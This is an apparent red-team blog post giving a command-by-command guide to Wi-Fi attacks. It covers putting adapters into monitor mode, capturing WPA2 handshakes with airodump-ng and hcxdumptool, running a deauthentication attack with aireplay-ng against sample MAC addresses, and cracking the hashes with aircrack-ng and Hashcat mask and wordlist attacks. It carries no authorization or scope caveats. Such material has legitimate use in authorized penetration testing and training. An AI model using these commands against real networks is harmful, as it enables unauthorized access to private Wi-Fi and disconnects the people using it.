Home

Published

- 4 min read

Bread and Butter Wifi Attacks and Hash Cracking

Offensive Security RedTeam Pentesting Cybersecurity
img of Bread and Butter Wifi Attacks and Hash Cracking

Bread and Butter Wifi Attacks and Hash Cracking

Wi-Fi cracking is a fundamental skill. We’re looking at the Aircrack-ng suite, alongside other tools that developed the state-of-the-art… art of wpa2 hash capturing and cracking.

Aircrack-ng Setup

We’re gonna work with root permissions most of the time.

bash
   $ sudo -i

For those using the RTL8812AU chipset, installing the driver is straightforward.

bash

   $ git clone -b v5.6.4.2 https://github.com/aircrack-ng/rtl8812au.git
$ cd rtl8812au
$ make install

Managing Drivers

Removing and reinstalling network drivers can often resolve issues with device compatibility.

bash
   $ dpkg -r realtek-rtl88xxau-dkms
$ dpkg -r realtek-rtl8814au-dkms

Repo Drivers

Be careful when going with drivers from the repos - most of the time you’ll end up in more trouble.

bash

   $ apt install realtek-rtl88xxau-dkms
$ apt install btscanner aircrack-ng kismet
$ pip3 install kismet_rest deepdiff

Device Configuration

Before launching any attacks, confirm that your network devices are properly recognized and configured:

bash
   $ dmesg | grep 88xx
$ iwconfig

More useful commands

bash
   $ lsmod
$ blkid
$ lsblk
$ lsusb

Process Management

We noticed better success rate when killing the processes like this, instead of the airmon-way… this might be system or adapter specific.

bash
   $ killall wpa-supplicant NetworkManager

Alternatively, you can use airmon-ng to manage interfering processes.

bash

   $ airmon-ng check kill

Initiating Monitor Mode

Monitor mode is essential for capturing packets.

bash
   $ airmon-ng start wlan0 wlan1

Dumping Hashes

Kismet

Kismet allows for detailed network scanning using multiple adapters.

bash
   $ kismet -c wlan0 -c wlan1

airodump-ng

The defacto standard still works great - even though more sophisticated tools are available today.

bash
   $ airodump-ng -o dump01 wlan0,wlan1 --output-format pcap

More useful params

bash
   --essid MyWifiAP 
--bssid ... 
-b abg (bands 2.4/5Ghz) 
-c 1 (channel)
--essid-regex ".*Vag\|VAG\|vag{1}.*" 
-d "CIA Surveillance Van" 
-t OPN

hc-tools

hcxdumptool

For more targeted attacks, tools like hcxdumptool are useful for capturing newer types of hashes. However, pkmid usage is rare, so you might not get what you expect. We found little to no noticeable advantage when dumping directly with hcx tools over using airodump - this may of course be region / target dependent.

We’re still very happy about the development of hcx tools as well as overall progress in Wifi dumping / cracking tools.

bash
   $ hcxdumptool -i wlan0 -o dump02.pcapng

Converting capture files

for processing with hashcat.

bash
   $ apt install hcxtools
$ hcxpcapngtool -o pcapng_hashes *.cap

Deauthentication Attacks

A simple deauthentication attack can disconnect clients from their access points:

bash
   $ aireplay-ng --deauth 200 -a BA:A2:34:22:E7:68 -c 6D:A7:EC:3A:47:58 wlan0

Cracking Hashes

Using Aircrack-ng for local cracking is straightforward but can be slow:

aircrack-ng

bash
   $ aircrack-ng dump.pcap -w wordlist.txt

Hashcat

bash
   $ .\hashcat.exe -m 22000 -d 2 -a 6 -i --increment-min=3 -1 ?l?d -2 ?u?l?d hashes.pcapng rockyou.txt ?2?1?1?1?s?s 
$ .\hashcat.exe -m 22000 -d 2 -a 6 -i -1 "?l?d!_-+*$" hashes.pcapng wpa2_ultimate.txt ?1?1?1?1

Display SSIDs

https://github.com/Network-Sec/bin-tools-pub/blob/main/hashdump_to_ssid.py

We made a little bin tool to display SSIDs from hashdump files.

EAPOL

Capturing the complete 4-way handshake including EAPOL isn’t as important as hcxpcapngtool and some hashcat forum post may make it sound like. airodump-ng in certain scenarios still delievers, in certain scenarios even faster and better than hcxdumptool.

The conversion will work besides the tool complaining and the resulting hashes are the same. Of course, the PKMID attack is a different story, but since it’s finding many modern routers have been patched and are no longer vulnerable to this attack, while we still can capture WPA2 hashes the traditional way.

Tshark and Tcpdump

Don’t skip learning about Tshark and Tcpdump. They will deliver much needed insights, “how this works” and also provide you with easy methods to do manually what hcxcapngtool can do, with custom options to choose.

Wordlists

specific for Wifi. We created couple of Wordlist Generator helper tools, you can find them in our GitHub:
https://github.com/Network-Sec/Wordlists

More Wordlist resources:

Important: We can get a massive speed and success rate gain, if we exclude words shorter than 8 chars, as this is the min length for WPA2.

bash
   $ cat rockyou.txt | grep --binary-files=text -Pe "^[\w\d\s]{8,32}$" | sort -u > wifi_rockyou.txt

Next Up

We’ll follow up with a dedicated article abouth Hash Cracking Strategies, an applied field manual of modern techniques, that help you to tackle hashes, which are more difficult than top-10000-wordlist passwords or 7 random chars.

Conclusion

“Welcome to the 21st Century. Where sex is free, but love is expensive. Where Pizza arrives faster than an Ambulance and a Smartphone is more important than dignity.”

“Welcome to the darkness, where lying is modern, treason is smart and poverty a flaw.”